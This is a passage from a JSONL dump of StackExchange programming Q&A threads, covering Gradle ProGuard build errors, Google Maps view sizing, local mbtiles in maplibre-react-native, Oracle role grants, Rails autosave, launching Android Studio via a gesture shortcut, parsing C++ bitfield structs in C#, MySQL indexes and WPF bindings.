app\/src\/main\/jniLibs directory,\n \/\/ Android Studio will pack them into APK's lib\/ directory\n \/\/ Here we like to avoid another duplication by pointing\n \/\/ to the files that containing our libs' distribution location\n \/\/ so the same file is used by compiler at host, also packed\n \/\/ into APk to be used at Target (phone\/tablet)\n source {\n srcDir \"${lib_distribution_root}\/nativeaudio\/lib\"\n srcDir \"${lib_distribution_root}\/fpextractor\/lib\"\n \/\/srcDir \"${lib_distribution_root}\/gperf\/lib\"\n }\n }\n }\n }\n buildTypes {\n release {\n minifyEnabled true\n shrinkResources true\n proguardFiles.add(file('proguard-android.txt'))\n proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'\n }\n }\n }\n}\n\ndependencies {\n println rootProject.getName()\n compile fileTree(include: ['*.jar'], dir: 'libs')\n compile 'com.android.support:support-v4:25.3.1'\n compile 'commons-net:commons-net:3.5'\n \/\/compile 'com.android.support:appcompat-v7:23.3.0'\n compile 'com.android.support:appcompat-v7:25.3.1'\n compile 'com.android.support:design:25.3.1'\n compile 'com.android.support:cardview-v7:25.3.1'\n compile 'com.android.support:recyclerview-v7:25.3.1'\n compile 'com.google.android.gms:play-services-appindexing:9.8.0'\n compile 'com.amazonaws:aws-android-sdk-core:2.4.2'\n compile 'com.amazonaws:aws-android-sdk-s3:2.4.2'\n compile 'com.amazonaws:aws-android-sdk-ddb:2.4.2'\n compile 'com.amazonaws:aws-android-sdk-cognitoidentityprovider:2.4.2'\n}\n\n\/\/ Unnecessary dependency management:\n\/\/ Make sure the libs are available when begin compiling application project\n\/\/ This could be ignored because in real scenario, the pre-built libs are\n\/\/ already given to us before creating application.\ntasks.whenTaskAdded { task ->\n if (task.name.contains('compile')) {\n task.dependsOn ':nativeaudio:distributeLib'\n task.dependsOn ':fpextractor:distributeLib'\n }\n}\n<\/code>\nPlease: Can anyone help me to understand why I have always the following error:\n\nNo signature of method:\n org.gradle.model.ModelMap.getDefaultProguardFile() is applicable for\n argument types: (java.lang.String) values: [proguard-android.txt]\nComment: have you tried a newer version of gradle build tools than 0.9.3?\nComment: the version 0.9.3 it the latest gradle-experimental. The build work fine if I set **minifyEnabled false** and comment out shrinkResources and proguardFiles. But as soon as I set **minifyEnabled true** the and uncoment the proguard file, the build fails\nComment: that's expected since you need proguard only for minify. Is there a reason you need experimental gradle ?\nComment: I use experimental gradle because I have to compile also native code (ndk) in my project.\nAnswer: Gradle experimental does not include getDefaultProguardFile() since it does not have any version of ProGuard config by default.\nYou can use move the lines from your <code>proguard-android.txt<\/code> to <code>proguard-rules.pro<\/code> and then change this line:\n<code>proguardFiles.add(file('proguard-android.txt'))\nproguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'\n<\/code>\ninto this:\n<code>proguardFiles.add(file('proguard-rules.pro'))\n<\/code>\nAnswer: For me adding a manifest with\n<code>jar {\n manifest {\n attributes 'Main-Class': com.package.to.main.Class\n }\n}\n<\/code>\nhelped.\nSee here: Creating runnable JAR with Gradle\n","meta":{"source":"stackoverflow","title":"build gradle fail with \"no signature of method .... is applicable for argument types: (java.lang.String) values\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plain Google Maps App - How can I resize the container?\n\nQuestion: Here's my ViewController implementation:\n<code> @implementation ViewController\n\n -\n (void) viewDidLoad {\n [super viewDidLoad];\n \/\/ Do any additional setup after loading the view, typically from a nib.\n }\n\n -\n (void) didReceiveMemoryWarning {\n [super didReceiveMemoryWarning];\n \/\/ Dispose of any resources that can be recreated.\n }\n\n -\n (void) loadView {\n \/\/ Create a GMSCameraPosition that tells the map to display the\n \/\/ coordinate -33.86,151.20 at zoom level 6.\n GMSCameraPosition * camera = [GMSCameraPosition cameraWithLatitude: -33.86\n longitude: 151.20\n zoom: 6\n ];\n GMSMapView * mapView = [GMSMapView mapWithFrame: CGRectZero camera: camera];\n mapView.myLocationEnabled = YES;\n self.view = mapView;\n\n \/\/ Creates a marker in the center of the map.\n GMSMarker * marker = [\n [GMSMarker alloc] init\n ];\n marker.position = CLLocationCoordinate2DMake(-33.86, 151.20);\n marker.title = @ \"Sydney\";\n marker.snippet = @ \"Australia\";\n marker.map = mapView;\n }\n\n @end\n<\/code>\nHow can I resize this window, because right now it spans all over the screen? I want it to be smaller so it fits into a smaller box below the status bar on top.\nAnswer: Create a UIView and add mapView as subview\n<code> UIView *yourView = [[UIView alloc] initWithFrame:CGRectMake(10, 64, 200, 200)];\n [self.view addSubview:yourView];\n<\/code>\nJust replace\n<code> GMSMapView * mapView = [GMSMapView mapWithFrame: CGRectZero camera: camera];\n<\/code>\nwith\n<code> GMSMapView * mapView = [GMSMapView mapWithFrame: yourView.bounds camera: camera];\n<\/code>\nalso replace\n<code>self.view = mapView;\n<\/code>\nwith\n<code>[yourView addSubview:mapView];\n<\/code>\nComment: For the last one, [testView addSubview:mapView];, my compiler said use of undeclared identifier \"testView\".\nComment: My mistake replace it with yourview\nComment: Thanks it has compiled. However, now its just a blank white screen (google maps not load).\nAnswer: Change this line :\n<code> self.view = mapView;\n<\/code>\nTo : \n<code>[self.view addSubview:mapView];\nmapView.frame = CGRectMake(0, 64,300, 300);\/\/ Set your Expected size here.\n<\/code>\n\nReason behind your issue is you are setting <code>mapView<\/code> as your main view\n so its taking mainView size and showing into fullscreen.\n\nHope this will help you to change your <code>mapView<\/code> size.\nComment: It says Undeclared Identifier \"addSubView\"\nComment: sorry typo mistake try `[self.view addSubview:mapView];`\n","meta":{"source":"stackoverflow","title":"Plain Google Maps App - How can I resize the container?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Render local .mbtiles from file in maplibre-react-native\n\nQuestion: I am wondering if it's possible to overlay a <code>mbtiles<\/code> file using a <code>VectorSource<\/code> and <code>FillLayer<\/code> using <code>maplibre-react-native<\/code>. Currently my setup works with a remotely hosted dataset, but not when using a .mbtiles file with a path from the documents filesystem path.\nI am using Expo workflow with the dev-client, so I'd be best if it could be done without touching native files.\n<code>const downloadMbtiles = async () => {\n const remoteUrl = 'my-url';\n const localPath = FileSystem.documentDirectory + 'test.mbtiles';\n const { status, uri } = await FileSystem.downloadAsync(remoteUrl, localPath);\n console.warn(status, uri); \/\/ 200 ok\n};\n\nreturn (\n <MapLibreGL.VectorSource\n key={'maps-overlay'}\n id={'maps-source'}\n url={FileSystem.documentDirectory + 'test.mbtiles'}\n >\n <MapLibreGL.FillLayer\n id={'test-overlay'}\n sourceLayerID={'test-123'}\n style={{\n fillOpacity: 0.8,\n fillColor: [\n 'interpolate',\n ['linear'],\n ['get', 'v'],\n 0,\n 'gold',\n 2,\n 'red',\n ],\n }}\n \/>\n <\/MapLibreGL.VectorSource>\n);\n\n<\/code>\nAnswer: To use a local <code>.mbtiles<\/code> file with <code>maplibre-react-native<\/code> in an Expo workflow without touching native code, you could try and serve the <code>.mbtiles<\/code> file over HTTP using a local server within your app.\nThat would involve using a library like <code>expo-server<\/code> (or any other suitable library) to serve files locally: start a local server, serve the <code>.mbtiles<\/code> file, and then use the local server's URL as the source URL in your <code>VectorSource<\/code>.\nI see an @expo\/server package, published a month ago (with a fairly recent changelog).\nTry instead mbtiles-server or the more recent <code>tileserver-gl<\/code> (<code>npm install -g tileserver-gl<\/code>).\nA <code>tileserver-gl path\/to\/your\/test.mbtiles<\/code> should start a local server, usually accessible at <code>http:\/\/localhost:8080<\/code>, serving tiles from your <code>.mbtiles<\/code> file. The console output will provide the exact URL.\nWith your tile server running, you will need to update your <code>maplibre-react-native<\/code> component to fetch tiles from your local <code>tileserver-gl<\/code> instance. Replace the <code>url<\/code> prop in the <code>VectorSource<\/code> component with the URL provided by <code>tileserver-gl<\/code>s:\n<code>const LOCAL_TILESERVER_URL = \"http:\/\/localhost:8080\/data\/v3\/{z}\/{x}\/{y}.pbf\";\n\nreturn (\n <MapLibreGL.VectorSource\n key={'maps-overlay'}\n id={'maps-source'}\n url={LOCAL_TILESERVER_URL} \/\/ Use the URL provided by tileserver-gl\n >\n <MapLibreGL.FillLayer\n id={'test-overlay'}\n sourceLayerID={'test-123'}\n style={{\n fillOpacity: 0.8,\n fillColor: [\n 'interpolate',\n ['linear'],\n ['get', 'v'],\n 0,\n 'gold',\n 2,\n 'red',\n ],\n }}\n \/>\n <\/MapLibreGL.VectorSource>\n);\n<\/code>\nSince <code>tileserver-gl<\/code> runs outside the Expo environment, there should be no compatibility issues. However, make sure your mobile device or simulator can access the local server. If testing on a physical device, your device and the server must be on the same network, and you may need to use your machine's IP address instead of <code>localhost<\/code>.\n\nIf I were to host a tiling server, I could better host my own and make this much easier. My idea is to do this locally without any servers. I thought it must be doable since there exists a <code>mbtiles:\/\/<\/code> protocol in the <code>gl-js<\/code> library.\n\nThat would mean a more integrated and seamless solution within the Expo and <code>maplibre-react-native<\/code> environment. Unfortunately, the <code>mbtiles:\/\/<\/code> protocol implementation in <code>maplibre-gl-js<\/code> is designed for direct access to <code>.mbtiles<\/code> files, which is not directly supported in a React Native (and by extension, Expo) environment due to the sandboxed nature of mobile app file systems and the React Native runtime.\nOne theoretical approach to achieve direct <code>.mbtiles<\/code> usage would be to develop a custom native module for React Native that implements <code>.mbtiles<\/code> file reading and tile serving functionality directly within the app. That module could expose a method to React Native that returns tile images given x, y, and z parameters, mimicking a tile server's response but locally.\nBut: that would require ejecting from Expo's managed workflow to add custom native code, which is what you wanted to avoid.\nAnother approach, not fully aligned with avoiding server setups, involves extracting the tiles from the <code>.mbtiles<\/code> file and bundling them with the app. That method, while also somewhat cumbersome, would allow for using the tiles directly from the filesystem. Tools like <code>mbutil<\/code> or custom scripts could automate the extraction process.\nThe main drawback is the significant increase in app size and the static nature of the tile data.\nHence, the first proposed approach, running a local server within the app (or using an embedded server that starts with the app) and accessing this server through a <code>WebView<\/code> component. It uses <code>tileserver-gl<\/code> or a similar tool, running it in a way that is encapsulated within the app's environment.\nWhile this still involves a server, it is local to the app and does not require external hosting.\nComment: Thanks for your detailed answer. This sounds like it could work, but is ofcourse a bit hacky. If I were to host a tiling server, I could better host my own and make this much easier. My idea is to do this local without any servers. I thought it must be doable since there exists a `mbtiles:\/\/` protocol in the `gl-js` library.\n","meta":{"source":"stackoverflow","title":"Render local .mbtiles from file in maplibre-react-native","dup_signals":{}},"subset":"stackexchange"} +{"text":"Could not grant roles permission in \"Run SQL Command Line\" powered by oracle 11g\n\nQuestion: I am trying to create a role in an Oracle 11g database using the SQL Command Line, but I am receiving errors related to insufficient privileges. Specifically, I am trying to grant the \"CREATE ANY ROLE\" privilege to the user account, but I am receiving an \"ORA-00911: invalid character\" error.\nSteps taken:\n\nCreated a new database on Oracle 11g with a user account named \"21F_9208\".\n\nConnected to the database using the SQL Command Line and verified that the user account can view tables in the database.\n\nAttempted to create a new role using the following SQL command:\n\nCREATE ROLE superadmin;\n\nReceived an error message indicating that the user did not have sufficient privileges to create a role.\n\nAttempted to grant the \"CREATE ANY ROLE\" privilege to the user account using the following SQL command:\n\nGRANT CREATE ANY ROLE TO 21F_9208;\n\nReceived an \"ORA-00911: invalid character\" error message.\n\nPotential solutions by CHAT GPT but I am beginner so that did not helped me out:\n\nVerify that the user account has the necessary permissions to create roles and grant privileges. This may involve checking the user's roles and privileges using the SQL Command Line or Oracle Enterprise Manager.\nCheck the syntax of the SQL commands to ensure that they are properly formatted and do not contain any typos or errors.\nContact Oracle support for assistance in resolving the issue, particularly if the user does not have the necessary permissions to perform the required tasks.\n\njust want to give permissions to the my oracle 11g database 21F_9208 so that I can execute this statement to complete my assignment:\nGRANT SELECT, INSERT, UPDATE, DELETE ON admin TO superadmin;\nThis is role which need to be given permission to do the following things on the admin table\nAnswer: Only privileged users (such as <code>SYS<\/code>, unless you created your own) can create new users.\nIt means that <code>SYS<\/code> first has to\n<code>grant create role to \"21F_9208\";\n<\/code>\n(by the way, that's poorly chosen username; why did you set it that way? Now you have to qualify it using double quotes every time, as its name starts with a number. That is reason for error you got: \"<code>ORA-00911: invalid character<\/code>\").\nThat user (<code>\"21F_9208\"<\/code>) - apparently - owns table named <code>admin<\/code> because you want to grant DML privileges (select, insert, ...) on it to newly created role, <code>superadmin<\/code>.\n\nHere's a walkthrough.\nCreating new user:\n<code>SQL> show user\nUSER is \"SYS\"\nSQL> select tablespace_name from dba_tablespaces;\n\nTABLESPACE_NAME\n------------------------------\nSYSTEM\nSYSAUX\nUNDOTBS1\nTEMP\nUSERS\n\nSQL> create user \"21F_9208\" identified by demo\n 2 default tablespace users\n 3 quota unlimited on users\n 4 temporary tablespace temp;\n\nUser created.\n<\/code>\nGranting basic privileges (just to make this example work):\n<code>SQL> grant create session, create table, create role to \"21F_9208\";\n\nGrant succeeded.\n<\/code>\nConnect as newly create user:\n<code>SQL> connect \"21F_9208\"\/demo@pdb1\nConnected.\n<\/code>\nCreate table:\n<code>SQL> create table admin (id number);\n\nTable created.\n<\/code>\nCreate role:\n<code>SQL> create role superadmin;\n\nRole created.\n<\/code>\nGrant privileges to role:\n<code>SQL> grant select, insert, update, delete on admin to superadmin;\n\nGrant succeeded.\n\nSQL>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Could not grant roles permission in \"Run SQL Command Line\" powered by oracle 11g","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails 5 - polymorphic with autosave not working\n\nQuestion: In my app, I have a Tag model in a polymorphic relationship with Annotation and Document.\nTag\n<code>belongs_to :tagable, :polymorphic => true<\/code>\nAnnotation\n<code>has_many :tags, :as => :tagable, dependent: :destroy, autosave: true<\/code>\nDocument\n<code>belongs_to :tagable, :polymorphic => true, autosave: true<\/code>\nYet autosave does not work. What am I doing wrong?\nComment: What do you mean by does not work? Do you get an error? Does the creation work? What about the destruction? Also can you share the code you're using to for this?\nComment: does not update\/save; what code would you need?\nComment: I'm thinking about the one you use to create objects.\nComment: I can't understand what you're doing and what you want to accomplish. Make sure you're reading these: http:\/\/stackoverflow.com\/questions\/5403372\/has-one-belongs-to-association-autosave-true-not-saving, http:\/\/stackoverflow.com\/questions\/11605120\/autosave-ignored-on-has-many-relation-what-am-i-missing and ofc https:\/\/github.com\/rails\/rails\/blob\/56b3849316b9c4cf4423ef8de30cbdc1b7e0f7af\/activerecord\/lib\/active_record\/autosave_association.rb#L95\nAnswer: Autosave is not causing the issue; this needs to be implemented using nested forms, <code>accepts_nested_attributes_for<\/code> with <code>reject_if<\/code>.\n","meta":{"source":"stackoverflow","title":"Rails 5 - polymorphic with autosave not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"command for opening android studio\n\nQuestion: I recently installed easystroke on my Ubuntu 14.04 LTS system. I want to add a shortcut stroke for the same. Can you guys tell me what command to use?\nlocation of android studio is\n<code>\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh\n<\/code>\nfor other apps like firefox i use\n<code> wmctrl -a Firefox || firefox\n<\/code>\nbut this does not work for android studio\nalso \n<code>xdg-open of \/home\/.... \n<\/code>\nopens the bash file in text editor instead of terminal..\nPls help me out guys\nAnswer: Try this:\n<code>xdotool type \"sh '\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh'\" ; xdotool key KP_Enter\n<\/code>\nif not work try this then:\n<code>wmctrl -a \"Android Studio\" || \"\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh\"\n<\/code>\nComment: sorry bt that didnt work :(\nComment: @ChrisAbyAntony check my edit\nComment: Had we really the same idea at the same time? =)\nComment: @A.B. It's really not my idea , I just use this http:\/\/www.timelessguru.com\/easystroke :)\nComment: yeah this works perfect but seems that A.B. posted it first\nComment: @ChrisAbyAntony Good don't matter\nAnswer: With this command:\n<code>wmctrl -a \"Android Studio\" || \"\/home\/antony\/Documents\/Android Studio Installation Files\/android-studio\/bin\/studio.sh\"\n<\/code>\nUse the full path with double quotes.\n\nfrom <code>man wmctrl<\/code>\n<code> -a <WIN>\n Switch to the desktop containing the window <WIN>, raise the window, and give it\n focus.\n\n <WIN> This argument specifies a window that is the target of an action. By default the\n argument is treated as if were a string, and windows are examined until one is\n found with a title the contains the specified string as a substring. The substring\n matching is done in a case insensitive manner. The -F option may be used to force\n exact, case sensitive title matching. The option -i may be used to interpret the\n window target as a numeric window identity instead of a string.\n<\/code>\nComment: for some weird reason it didn work at first . now it works like a charm.\n","meta":{"source":"askubuntu","title":"command for opening android studio","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fail Read Int64 value from binary file created by C++\n\nQuestion: I m developing a C# CE application to read data from binary files which created by C++ progam to do item validation.\nBelow is the coding of the C++ program..\n<code> \/\/ File Name: Ean2an.bin which is created by struct \n struct EAN2AN_TYPE \n {\n __int64 ean:40; \/\/ 5 bytes, up to 12 digits\n __int64 rec_no:24; \/\/ 3 bytes rec no in the c_ItemMaster File, up to 16 million records\n };\n\n \/\/ After bind data to struct, wil create the binary file\n bool CreateBin_EAN2AN_TYPE()\n {\n if(mn_RecordCount_EAN2AN_TYPE == 0) return false;\n\n FILE *binfile;\n\n qsort(mc_EAN2AN_TYPE, mn_RecordCount_EAN2AN_TYPE, sizeof(struct EAN2AN_TYPE), qsort_EAN2AN_TYPE);\n try\n {\n binfile = fopen(ms_Path_EAN2AN_TYPE, \"wb\");\n fwrite(&mc_EAN2AN_TYPE, sizeof(struct EAN2AN_TYPE), mn_RecordCount_EAN2AN_TYPE, binfile);\n }\n catch(Exception ^ex)\n {\n TaskProgramLibrary::Message::ERR(\"Create EAN2AN_TYPE.bin fail!\\r\\n \" + ex->Message);\n }\n finally\n {\n fclose(binfile);\n\n mdw_FileSize_EAN2AN_TYPE = FileSize(ms_Path_EAN2AN_TYPE);\n }\n\n return true;\n }\n<\/code>\nI tried to read the data by using binary read(based on position) and use bitconverter to convert to int64 or using Marshal.PtrToStructure, but the value return is incorrect. Then i tried to read 5 bytes instead of 8 bytes from the file, but the value return stil incorrect.\n<code>Below is the written C# coding\n \/\/Struct created in C#\n [StructLayout(LayoutKind.Sequential)]\n public struct EAN2AN_TYPE\n {\n [MarshalAs(UnmanagedType.I8)]\n public Int64 ean;\n [MarshalAs(UnmanagedType.I8)]\n public Int64 rec_no;\n } \n\n \/\/The ways i tried to read in C#\n \/\/1.Read Int64 by Binary \n private void ReadByBinary()\n {\n using (BinaryReader b = new BinaryReader(_fs))\n {\n while (b.PeekChar() != 0)\n {\n Int64 x = b.ReadInt64();\n Console.WriteLine(x.ToString());\n\n }\n }\n\n }\n\n \/\/2.Using Marshal to convert the Intptr to struct's field type\n private object ReadByMarshal(Type iType)\n {\n _oType = iType;\/\/ typeof(System.Int64);\n byte[] buffer = new byte[Marshal.SizeOf(_oType)];\n \/\/byte[] buffer = new byte[5];\n\n object oReturn = null;\n\n try\n {\n _fs.Read(buffer, 0, buffer.Length);\n\n GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);\n oReturn = Marshal.PtrToStructure(handle.AddrOfPinnedObject(), _oType);\n handle.Free();\n\n return oReturn;\n }\n catch (Exception ex)\n {\n throw ex;\n }\n }\n\n \/\/3. Use Binary and use bit converter to convert to Int64\n private void ReadByBinaryAndUseBitConverter()\n {\n using (BinaryReader b = new BinaryReader(_fs))\n {\n byte[] x = b.ReadBytes(8);\n Int64 y = BitConverter.ToInt64(x, 0);\n Console.WriteLine(y);\n\n byte[] x2 = b.ReadBytes(8);\n Int64 y2 = BitConverter.ToInt64(x2,0);\n Console.WriteLine(y2);\n }\n\n }\n\n \/\/4. Use Marshal and convert to struct\n public EAN2AN_TYPE GetStructValue()\n {\n\n byte[] buffer = new byte[Marshal.SizeOf(typeof(EAN2AN_TYPE)];\n\n EAN2AN_TYPE oReturn = new EAN2AN_TYPE();\n\n try\n {\n \/\/if (EOF) return null;\n\n _fs.Read(buffer, 0, buffer.Length);\n GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);\n IntPtr rawDataPtr = handle.AddrOfPinnedObject();\n\n oReturn = (EAN2AN_TYPE)Marshal.PtrToStructure(rawDataPtr, typeof(EAN2AN_TYPE));\n\n handle.Free();\n\n if (_fs.Position >= _fs.Length)\n Close();\n\n return oReturn;\n }\n catch (Exception ex)\n {\n throw ex;\n }\n }\n<\/code>\nEdit:Upload image for the binary file\n\nEdit:The first 8 bytes value read by C# program\n\nThe binary data shown by editor\n\nAnybody have any idea?\nThanks in advance \nComment: what value did you expect, and what incorrect value did you get? did you look at the file with a hex editor to see whether the file contains the correct value?\nComment: Take a look at my answer below. I have a variable called \"incoming\". Show us what the 8 bytes are of your *actual* data in that same format, and tell use what the `ean` and `rec-no` values you expect to get from those 8 bytes are.\nComment: A screen shot of a binary file opened in a text editor is of little to no use. You are trying to deserialize 8 bytes. Show us those 8 bytes, and just those 8, in the order they are in the file and preferrably in hexadecimal.\nAnswer: <code>ean<\/code> is defined as a 40-bit entity and <code>rec_no<\/code> is 24-bit, making the entire struct only 64 bits. Your definition of <code>EAN2AN_TYPE<\/code> is 128 bits, so there's obviously going to be a problem. I question the sanity of whoever wrote the initial code, but your job is to get it back and use it, so you play with what you're dealt.\nEDIT: Updated to use your specified data and take into account Ben's complaint\nHere are two ways to get the same result. One is a little easier to understand since it does the movement in steps, the other is faster and \"more correct\". I put your example EAN data into my input to verify the results.\n<code>public struct EAN2AN_TYPE\n{\n public long ean; \/\/ can hold 5 bytes\n public int rec_no; \/\/ can hold 3 bytes\n}\n\nbyte[] incoming = new byte[] { 0x6F, 0x5D, 0x7C, 0xBA, 0xE3, 0x06, 0x07, 0x08 };\n<\/code>\nMemory Copying:\n<code>using(var stream = new MemoryStream(incoming))\nusing (var reader = new BinaryReader(stream))\n{\n \/\/ I leave it to you to get to the data\n stream.Seek(0, SeekOrigin.Begin);\n\n \/\/ get the data, padded to where we need for endianness\n var ean_bytes = new byte[8];\n \/\/ read the first 5 bytes\n Buffer.BlockCopy(reader.ReadBytes(5), 0, ean_bytes, 0, 5);\n var rec_no_bytes = new byte[4];\n \/\/ read the last 3\n Buffer.BlockCopy(reader.ReadBytes(3), 0, rec_no_bytes, 0, 3);\n\n var ean2 = new EAN2AN_TYPE();\n\n \/\/ convert\n ean2.ean = BitConverter.ToInt64(ean_bytes, 0);\n ean2.rec_no = BitConverter.ToInt32(rec_no_bytes, 0);\n}\n<\/code>\nBit shifting:\n<code>using (var stream = new MemoryStream(incoming))\nusing (var reader = new BinaryReader(stream))\n{\n \/\/ I leave it to you to get to the data\n stream.Seek(0, SeekOrigin.Begin);\n\n \/\/ get the data\n var data = BitConverter.ToUInt64(reader.ReadBytes(8), 0);\n var ean2 = new EAN2AN_TYPE();\n\n \/\/ shift into our data\n ean2.ean = (long)(data & ~0xFFFFFF0000000000);\n ean2.rec_no = (int)(data >> 40);\n}\n<\/code>\nOf course you could make the <code>EAN2AN_TYPE<\/code> a class, feed it in 8 bytes, then have property accessors that do the shifting shenanigans for you as well. I'd do that if this has to be a 2-way thing (i.e. you need to put data into one of those structs to send back to the C app).\nComment: yuck yuck yuck. Bit shift operators are the right way to emulate bitfields in a language that doesn't have them.\nComment: @Ben: Agreed, though if you're new to programming, my first xample I think is a little more clear on what's actually happening (yes, perf is not as good and it generates garbage).\nAnswer: It could be a problem with the endianness (if that's a word) of the data. You'll get problems like this if the data was written on a big-endian system, and read as little-endian, or vice-versa.\nThe other problem is that the two fields are actually packed into one 64-bit value. You may need to read an Int64 and then use bit operations to extract the two fields. All of your code appears to be reading two Int64 values by various means.\nAnswer: Thanks for your reply..\nThe initial C++ code is written by vendor. I only can try understand by read the C++ code. As my understanding.. it just create binary file and write in the data.. \nI cant find any encoding\/convert part from code .. \nI tried to convert the 1st ean(978086288751) to byte[] manually by code.\nThe byte[] is 111 93 124 186 227 0 0 0 which is different for the result i get..\nI have tested ctacke suggested code. but i still not able to get the correct ean..\nBelow is the coding.. (i added in the filestream to read the binary file)\n<code> using (FileStream fileStream = File.OpenRead(_File))\n {\n MemoryStream memStream = new MemoryStream();\n memStream.SetLength(fileStream.Length);\n fileStream.Read(memStream.GetBuffer(), 0, (int)fileStream.Length);\n\n using (BinaryReader reader = new BinaryReader(memStream))\n {\n \/\/stream.SetLength(_fs); \n \/\/ I leave it to you to get to the data\n memStream.Seek(0, SeekOrigin.Begin);\n\n \/\/ get the data, padded to where we need for endianness\n byte[] ean_bytes = new byte[8];\n \/\/ if this is wrong - then change param 4 to '3' to align at the other end\n Buffer.BlockCopy(reader.ReadBytes(8), 0, ean_bytes, 0, 8);\n \/\/byte[] rec_no_bytes = new byte[4];\n\n byte[] rec_no_bytes = new byte[4];\n \/\/ if this is wrong - then change param 4 to '1' to align at the other end\n Buffer.BlockCopy(reader.ReadBytes(3), 0, rec_no_bytes, 0, 3);\n\n EAN2AN_TYPE ean2 = new EAN2AN_TYPE();\n\n \/\/ convert\n ean2.ean = BitConverter.ToInt64(ean_bytes, 0);\n ean2.rec_no = BitConverter.ToInt32(rec_no_bytes, 0);\n }\n\n }\n<\/code>\n\/\/Result\nread 5 bytes : 17 0 0 0 0 \nean : 17\n\/\/I changed to \n<code> var ean_bytes = new byte[8];\n Buffer.BlockCopy(reader.ReadBytes(8), 0, ean_bytes, 0, 8);\n<\/code>\nResult\nread 8 bytes :17 0 0 0 0 108 94 5\nean :386865365256241169\nSo sorry i m still a new user.. not able to post any attachment..\nHope you can understand from my interpretation.\nComment: This should be an update to the question, as it only adds clarity but doesn't provide an actual answer.\nComment: Show me the *exact* data you have in those 8 bytes and *exactly* what you're expecting for a result. Endianness might be at play, or the expectation might be that the data is in contiguous bytes, not stored as an actual numeric.\nComment: ya i m update my question.. and the result after i tried your suggest code. i still not able to get the correct ean =( am i miss anything in the coding?\nComment: Some of the exactly result read from the bin file: Ean No 978086288751\nRec No 162010\n \nEan No 497185017195\nRec No 196711\n \nEan No 200000035773\nRec No 421407\n \nEan No 71881353183\nRec No 517408\nI m not able to upload any file here and cant copy paste the binary file content here(due to a lot of \/0).. If you dun mind.. can i email you the bin file?\n","meta":{"source":"stackoverflow","title":"Fail Read Int64 value from binary file created by C++","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fields after \"ORDER BY\" or \"WHERE\" and index in MySQL\n\nQuestion: Do Fields after \"ORDER BY\" or \"WHERE\" might have index (PRIMARY, UNIQUE, INDEX) in mysql?\nConsider a table with the following columns:\n<code>ID | AddedDate | CatID | Title | Description | Status | Editor\n<\/code>\nIn these queries, are <code>ID<\/code>, <code>AddedDate<\/code> and <code>CatID<\/code> might have index?\n<code> SELECT * \n FROM table WHERE ID = $id\n\n SELECT * \n FROM table \nORDER BY ID\n\n SELECT * \n FROM table \nORDER BY AddedDate\n\n SELECT * \n FROM table \nORDER BY CatID\n<\/code>\nComment: You're gonna need to rephrase that, also give a query as an example case.\nComment: I've done what I can to restructure your question based on your update, but I still don't understand what you mean by \"might have index\".\nAnswer: You can order by any field. Please clarify our question if you want to know more \/ something else.\nYou might want to read <code>ORDER BY<\/code> optimization. There it says that fields with index might even improve the sorting as no extra has to be done (in the optimal case).\nUpdate:\nYes, you can add an index if you want (if this is what you mean, it is still not clear as OMG Ponies points out). In general it is to say that you should add an index to those fields that you often use in <code>WHERE<\/code> clauses. \nAnswer: As far as I know, there are three basic ways to order rows:\n\nIn-memory sort: Read all rows into memeory and sort them. Very fast.\nUsing sorted index: Read one row at a time, looking up the columns that are not in the index in the base table.\nFile sort: Build a sort order by reading a part of the table at a time. This is really slow.\n\nFor tables that fit in memory, MySQL will probably choose option 1. That means it won't use an index even if it's present. The index will just be overhead.\nBut indexes shine for bigger tables. If the table is too big for memory, MySQL can avoid the painful file sort and rely on the index.\nThese days, memory is plentiful, and tables almost always fit in memory. I would only add indexes for ordering after I saw a file sort happening.\nAnswer: One of the main benefits of having an index that it lets you select only that subset of rows you're interested in. The alternative to using an index is to do a \"full table scan\".\nUnless you have a \"where\" clause, you're not really going to get much benefit from having indexes.\n","meta":{"source":"stackoverflow","title":"Fields after \"ORDER BY\" or \"WHERE\" and index in MySQL","dup_signals":{}},"subset":"stackexchange"} +{"text":"WPF Converter and NotifyOnTargetUpdated exclusive in a binding?\n\nQuestion: I have a problem with a databinding in WPF.\nWhen I try to use a value converter and set the NotifyOnTargetUpdated=True property to True, I get an XamlParseException with the following message:\n\n'System.Windows.Data.BindingExpression'\n value cannot be assigned to property\n 'Contenu' of object\n 'View.UserControls.ShadowedText'.\n Value cannot be null. Parameter name:\n textToFormat Error at object\n 'System.Windows.Data.Binding' in\n markup file\n 'View.UserControls;component\/saletotal.xaml'\n Line 363 Position 95.\n\nThe binding is pretty standard:\n<code><my:ShadowedText Contenu=\"{Binding Path=Total,\n Converter={StaticResource CurrencyToStringConverter},\n NotifyOnTargetUpdated=True}\"\n TargetUpdated=\"MontantTotal_TargetUpdated\">\n<\/my:ShadowedText>\n<\/code>\n(Styling properties removed for conciseness)\nThe converter exists in the resources and works correctly when NotifyOnTargetUpdated=True is removed. Similarly, the TargetUpdated event is called and implemented correctly, and works when the converter is removed.\nNote: This binding is defined in a ControlTemplate, though I don't think that is relevant to the problem.\nCan anybody explain me what is happening ? Am I defining the binding wrong ? Are those features mutually exclusive (and in this case, can you explain why it is so) ?\nThanks in advance.\nMore info: Here is the content of the TargetUpdated handler:\n<code>private void MontantTotal_TargetUpdated(object sender, DataTransferEventArgs e)\n{\n ShadowedText textBlock = (ShadowedText)e.TargetObject;\n double textSize = textBlock.Taille;\n double delta = 5;\n double defaultTaille = 56;\n double maxWidth = textBlock.MaxWidth;\n while (true)\n {\n FormattedText newFormat = new FormattedText(textBlock.Contenu,\n CultureInfo.CurrentCulture, FlowDirection.LeftToRight,\n new Typeface(\"Calibri\"), textSize,\n (SolidColorBrush) Resources[\"RougeVif\"]);\n if (newFormat.Width < textBlock.MaxWidth && textSize <= defaultTaille)\n {\n if ((Math.Round(newFormat.Width) + delta) >= 